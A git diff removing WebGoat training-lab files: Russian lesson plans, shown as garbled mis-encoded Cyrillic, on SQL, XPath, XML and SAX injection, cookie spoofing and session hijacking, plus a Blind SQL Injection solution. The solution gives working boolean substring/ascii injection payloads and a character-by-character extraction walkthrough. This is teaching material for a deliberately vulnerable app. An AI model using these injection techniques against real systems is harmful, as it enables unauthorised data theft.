-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-
-Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Ðти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ
-на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах.
-ОÑновные цели и задачи:
-Ðиже раÑположена форма ÐºÐ¾Ñ‚Ð¾Ñ€Ð°Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ð°ÐµÑ‚ Ñ ÑƒÐ¶Ðµ извеÑтным вам веб-ÑервиÑом
-через его API. Внимательно изучите WSDL-файл и попробуйте отправить форму так,
-чтоб ÑÐµÑ€Ð²Ð¸Ñ Ð²ÐµÑ€Ð½ÑƒÐ» вам номера кредитных карт неÑкольких заказчиков.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html
deleted file mode 100644
index fb97ecbed..000000000
--- a/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html
+++ /dev/null
@@ -1,19 +0,0 @@
-
-
Ðазвание урока: How to Spoof an Authentication Cookie
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Многие Ñайты автоматичеÑки аутентифицируют Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ ÐµÑли он имеет оÑобые cookies.
-Иногда Ñодержимое таких cookies может быть угадано еÑли злоумышленник вычиÑлил алгоритм их генерации.
-Ð’ других ÑлучаÑÑ… cookies могут быть перехвачены, украдены через уÑзвимоÑти в приложении (например через XSS)
-или ÑиÑтеме пользователÑ. Ðа Ñтом уроке вы ознакомитеÑÑŒ Ñ Ð¸Ñпользованием таких cookies и
-попытаетеÑÑŒ обойти ÑиÑтему аутентификации оÑнованную на них.
-
-ОÑновные цели и задачи:
-
-Пользователь должен обойти механизм проверки аутентификации.
-Войдите под аккаунтом webgoat/webgoat и поÑмотрите что получитÑÑ.
-Вы также можете попробовать данные aspect/aspect. Как только вы поймёте
-как можно аутентифицироватьÑÑ Ð¿Ð¾Ð´ другими именами, попробуйте войти под
-логином alice.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/WeakSessionID.html b/src/main/webapp/lesson_plans/ru/WeakSessionID.html
deleted file mode 100644
index 0711706f6..000000000
--- a/src/main/webapp/lesson_plans/ru/WeakSessionID.html
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
Ðазвание урока: Похищение ÑеÑÑии
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Разработчики приложений, Ñоздающие Ñвои механизмы работы Ñ ÑеÑÑиÑми, иногда
-забывают о том что идентификаторы ÑеÑÑий должны генерироватьÑÑ Ñлучайным образом
-и иметь доÑтаточную длинну. Иначе они могут быть банально подобраны злоумышленником
-методом грубой Ñилы (brute force).
-ОÑновные цели:
-Попробуйте подобрать идентификатор рабочей ÑеÑÑии принадлежащей другому пользователю.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html b/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html
deleted file mode 100644
index be93e40e2..000000000
--- a/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
Lesson Plan Title:Welcome
-
-Concept / Topic To Teach:
-This lesson presents the basics for understanding the transfer of data between the browser and the web application.
-Standards Addressed:
-General Goal(s):
-Specific Objectives:
-Required Materials:
-Anticipatory Set (Lead-In):
-Step-By-Step Procedures:
-Plan For Independent Practice:
-Closure (Reflect Anticipatory Set):
-Assessment Based On Objectives:
-Extensions (For Gifted Students):
-Possible Connections To Other Subjects:
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/WsSAXInjection.html b/src/main/webapp/lesson_plans/ru/WsSAXInjection.html
deleted file mode 100644
index cd1dc0bd1..000000000
--- a/src/main/webapp/lesson_plans/ru/WsSAXInjection.html
+++ /dev/null
@@ -1,15 +0,0 @@
-
-
Ðазвание урока: Работа Ñ SAX-инъекциÑми в веб-ÑервиÑах
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Ðти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ
-на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах.
-ОÑновные цели и задачи:
-Ðекоторые веб-интерфейÑÑ‹ могут иÑпользовать веб-ÑервиÑÑ‹ в невидимом Ð´Ð»Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ñ€ÐµÐ¶Ð¸Ð¼Ðµ.
-ЕÑли веб-ÑÐµÑ€Ð²Ð¸Ñ Ð½Ð¸ÐºÐ°Ðº не проверÑет целоÑтноÑть входных данных (или проверÑет недоÑтаточно),
-пользователь может подделать XML отÑылаемый веб-интерфейÑом и выдать его за наÑтоÑщий.
-
-
-Ð’ данном упражнении попытайтеÑÑŒ Ñменить пароль Ð´Ð»Ñ Ð»ÑŽÐ±Ð¾Ð³Ð¾ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ ÐºÑ€Ð¾Ð¼Ðµ 101.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/WsSqlInjection.html b/src/main/webapp/lesson_plans/ru/WsSqlInjection.html
deleted file mode 100644
index c59407dd0..000000000
--- a/src/main/webapp/lesson_plans/ru/WsSqlInjection.html
+++ /dev/null
@@ -1,13 +0,0 @@
-
-
Ðазвание урока: ИÑпользование SQL-инъекций в веб-ÑервиÑах.
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-
-Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Ðти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ
-на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах.
-ОÑновные цели и задачи:
-Изучите внимательно WSDL-файл WebGoat и попробуйте получить
-номера кредитных карт других пользователей. Обратите внимание на то, что вы не
-будете видеть результат работы Ñервера на Ñкране. Ðо как только вы ÑоÑтавите верный
-запроÑ, Ñразу ÑоответÑтвующий пункт меню отметитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð¾Ð¹ галочкой.
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_plans/ru/XMLInjection.html b/src/main/webapp/lesson_plans/ru/XMLInjection.html
deleted file mode 100644
index 814e18cdc..000000000
--- a/src/main/webapp/lesson_plans/ru/XMLInjection.html
+++ /dev/null
@@ -1,22 +0,0 @@
-
-
Ðазвание урока: Как выполнÑÑŽÑ‚ÑÑ Ð°Ñ‚Ð°ÐºÐ¸ клаÑÑа 'XML-инъекциÑ'.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
-Ðа данном уроке вы научитеÑÑŒ оÑущеÑтвлÑть атаки клаÑÑа 'XML-инъекциÑ'
-
-
-
-Как работает данный вид атак:
-
-AJAX-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¸Ñпользуют XML Ð´Ð»Ñ Ð¿ÐµÑ€ÐµÐ´Ð°Ñ‡Ð¸ данных на Ñервер. Ушедший XML может быть легко перехвачен
-и изменён злоумышленником.
-
-ОÑновные цели:
-
-Ð’Ñ‹ видите ÑпиÑок призов, которые можно получить по программе 'WebGoat-Miles Reward Miles'.
-Когда вы введёте ID Ñвоего аккаунта приложение отобразит вам ваш Ð±Ð°Ð»Ð°Ð½Ñ Ð¸ ÑпиÑок призов, которые
-вы можете заказать. Цель - заказать призы на которые у Ð²Ð°Ñ Ð½Ðµ хватает очков.
-ID вашего аккаунта 836239.
-
-
diff --git a/src/main/webapp/lesson_plans/ru/XPATHInjection.html b/src/main/webapp/lesson_plans/ru/XPATHInjection.html
deleted file mode 100644
index 5d6f80ba2..000000000
--- a/src/main/webapp/lesson_plans/ru/XPATHInjection.html
+++ /dev/null
@@ -1,31 +0,0 @@
-
-
Ðазвание урока: ИÑпользование XPATH-инъекций.
-
-
-Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:
- Ð¡ÐµÐ¹Ñ‡Ð°Ñ Ð¼Ñ‹ раÑÑмотрим иÑпользование XPath-инъекций
-
-
-
-Как работает данный вид атак:
-
-По аналогии Ñ SQL-инъекциÑми, XPath-инъекции возникают тогда, когда пользовательÑкие
-данные без должной проверки попадают в Ð·Ð°Ð¿Ñ€Ð¾Ñ Ðº XML-данным. ПоÑÑ‹Ð»Ð°Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸ÑŽ
-Ñпецильно Ñформированные запроÑÑ‹ злоумышленник может раÑкрыть внутреннюю Ñтруктуру
-XML-базы и получить доÑтуп к той информации, к которой ему обращатьÑÑ Ð½ÐµÐ»ÑŒÐ·Ñ.
-Ðапример он может повыÑить Ñвои привилегии еÑли ему удаÑÑ‚ÑÑ
-произвеÑти XPath-инъекцию в отношении файла хранÑщего пользовательÑкие аккаунты.
-
-ЗапроÑÑ‹ к XML оÑущеÑтвлÑÑŽÑ‚ÑÑ Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ XPath - не Ñложного Ñзыка, позволÑющего
-определÑть меÑÑ‚Ð¾Ð½Ð°Ñ…Ð¾Ð¶Ð´ÐµÐ½Ð¸Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ð¸ в XML-Ñтруктуре. Как и в SQL, в нём вы можете
-уÑтанавливать критерии поиÑка. Ð’ ÑлучаÑÑ… когда данные Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ñ…Ñ€Ð°Ð½ÑÑ‚ÑÑ Ð² виде XML-базы,
-пользователь Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ одного или неÑкольких параметров запроÑа может определÑть что из неё будет
-извлечено и отображено на Ñайте. Ðти параметры должны тщательно проверÑтьÑÑ, чтоб атакующий
-не Ñмог изменить Ñтруктуру изначального XPath-запроÑа и извлечь чувÑтвительную информацию.
-
-
-ОÑновные цели:
-
-Форма ниже позволÑет работникам Ñмотреть их перÑональную информацию Ð²ÐºÐ»ÑŽÑ‡Ð°Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ
-о зарплате. Ваш аккаунт - Mike/test123. Цель - проÑмотреть данные других работников.
-
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db
deleted file mode 100644
index b269eb3f5..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml
deleted file mode 100644
index d016d8ce4..000000000
--- a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png
deleted file mode 100644
index ebb3f8cb8..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg
deleted file mode 100644
index eca131d99..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png
deleted file mode 100644
index 5efe24680..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg
deleted file mode 100644
index 64245b784..000000000
Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml b/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml
deleted file mode 100644
index 0c8218170..000000000
--- a/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image001.png b/src/main/webapp/lesson_solutions/BackDoors_files/image001.png
deleted file mode 100644
index 5a4d94ac7..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image003.png b/src/main/webapp/lesson_solutions/BackDoors_files/image003.png
deleted file mode 100644
index 8150275d8..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image005.png b/src/main/webapp/lesson_solutions/BackDoors_files/image005.png
deleted file mode 100644
index 62ebf88f6..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image007.png b/src/main/webapp/lesson_solutions/BackDoors_files/image007.png
deleted file mode 100644
index 9960dbc61..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image009.png b/src/main/webapp/lesson_solutions/BackDoors_files/image009.png
deleted file mode 100644
index be39f6ac3..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image011.png b/src/main/webapp/lesson_solutions/BackDoors_files/image011.png
deleted file mode 100644
index ef6e16606..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg
deleted file mode 100644
index c25f12992..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg
deleted file mode 100644
index 08f893f3d..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg
deleted file mode 100644
index 08c662842..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg
deleted file mode 100644
index 9299a4a2f..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg
deleted file mode 100644
index 49760e726..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg
deleted file mode 100644
index 735ea196b..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx b/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml b/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml
deleted file mode 100644
index 7f6641efb..000000000
--- a/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml
+++ /dev/null
@@ -1,30 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png
deleted file mode 100644
index 58cb8db49..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png
deleted file mode 100644
index e7380275b..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png
deleted file mode 100644
index 6984b9e74..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png
deleted file mode 100644
index bebf90cda..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png
deleted file mode 100644
index 917746bad..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png
deleted file mode 100644
index 05f16f195..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png
deleted file mode 100644
index f66852324..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png
deleted file mode 100644
index d167a7f35..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png
deleted file mode 100644
index 9139ad257..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png
deleted file mode 100644
index f8604adae..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image019.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png
deleted file mode 100644
index 5788c8d43..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image021.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png
deleted file mode 100644
index 368d0d456..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image023.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg
deleted file mode 100644
index b1aeffb19..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image025.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg
deleted file mode 100644
index 8addcb872..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image026.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg
deleted file mode 100644
index 0245a850c..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image027.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg
deleted file mode 100644
index 9e6b65ff8..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image028.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg
deleted file mode 100644
index 3586cede5..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg
deleted file mode 100644
index cdc430d9b..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image030.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg
deleted file mode 100644
index e9bb7a278..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image031.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg
deleted file mode 100644
index b4e1f851a..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image032.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg
deleted file mode 100644
index 468293b14..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image033.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg
deleted file mode 100644
index 3a463c317..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image034.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg
deleted file mode 100644
index 32f9278c2..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image035.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg
deleted file mode 100644
index 1ab696dcd..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image036.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx b/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK b/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
deleted file mode 100644
index 5ad40b6cd..000000000
--- a/src/main/webapp/lesson_solutions/BlindSqlInjection_files/BlindStringSqlInjection.htmlSOLBAK
+++ /dev/null
@@ -1,904 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
Lesson Plan Title: How to Perform Blind SQL Injection
-
-
-
-
Concept / Topic To Teach:
-
-
SQL injection
-attacks represent a serious threat to any database-driven site. The methods behind
-an attack are easy to learn and the damage caused can range from considerable
-to complete system compromise. Despite these risks an incredible number of
-systems on the internet are susceptible to this form of attack.
-
-
-
-
Not only is
-it a threat easily instigated, it is also a threat that, with a little
-common-sense and forethought, can be almost totally prevented. This lesson will
-show the student several examples of SQL injection.
-
-
-
-
It is always
-good practice to sanitize all input data, especially data that will used in OS
-command, scripts, and database queries.
-
-
-
-
General Goal(s):
-
-
The user
-should be able to view all records in the specified table. The user could add new records or modify
-existing records.
-
-
-
-
From the hints J
-
-
Compound SQL
-statements can be made by joining multiple tests with keywords like AND and OR.
-Create a SQL statement that you can use as a true/false test and then select
-the first character of the target element and do a start narrowing down the
-character using > and <
-
-
-
-
The backend
-database is HSQLDB. Keep that in mind if you research SQL functions
-on the Internet since different databases use some different functions and
-syntax.
-
-
This is the
-code for the query being built and issued by WebGoat:
-
-
-
-
"SELECT
-* FROM user_data WHERE userid = " + accountNumber
-
-
The
-application is taking your input and inserting it at the end of a pre-formed
-SQL command. You will need to make use of the following SQL functions:
-
-
-
-
SELECT -
-query for your target data and get a string
-
-
-
-
substr(string,
-start, length) - returns a substring of string starting at the start character
-and going for length characters
-
-
-
-
ascii(string)
-will return the ascii value of the first character in string
-
-
-
-
> and <
-- once you have a character's value, compare it to a choosen one
-
-
Example: is
-the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
-
-
-
-
-
101 AND (ascii(
-substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) < 77 );
-
-
-
-
-
If you get
-back that account number is valid, then yes. If get back that the number
-is invalid then answer is no.
-
-
Another
-example: is the second character of the first_name of userid 15613 greater than
-'m' (ascii 109)?
-
-
-
-
101 AND (ascii(
-substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) > 109
-);
-
-
-
-
If you get back
-that account number is valid, then yes. If get back that the number is invalid
-then answer is no.
-
-
-
-
-
-
Figure 1 Lesson 16
-
-
For the
-query: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613)
-, 1 , 1) ) < 77 ); you will get a "Account number is valid". If the
-character is bigger then the value you get an invalid account error message.
-
-
-
-
-
-
Figure 2 Invalid account number
-
-
-
-
You can
-change the < to = to make sure that you have the correct value.
-
-
This results
-in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 1 , 1) ) = 74 );
-
-
-
-
-
-
Figure 3 First character
-
-
-
-
So you know
-that ascii(74) is capital J. Now do the same for the second and all other
-characters.
-
-
-
-
-
-
-
-
The query for
-the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 2 , 1) ) = 111 );
-
-
Ascii(111) =
-o, so you have now Jo.
-
-
-
-
-
-
-
-
For the third
-character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e
-
-
For the
-fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s
-
-
For the fifth
-character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 5 , 1) ) = 112); Ascii(112) = p
-
-
For the sixth
-character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
-userid=15613) , 6 , 1) ) = 104); Ascii(104) = h
-
-
-
-
So the name
-that you found is Joesph. Enter this in the text field to complete this lesson.
-
-
-
-
-
-
Figure 4 Enter the name Joesph
-
-
-
-
-
-
Figure 5 Lesson 16 Completed
-
-
-
-
-
-
-
-
-
- Solution by Erwin Geirnaert
-
-
-
-
-
-
-
-
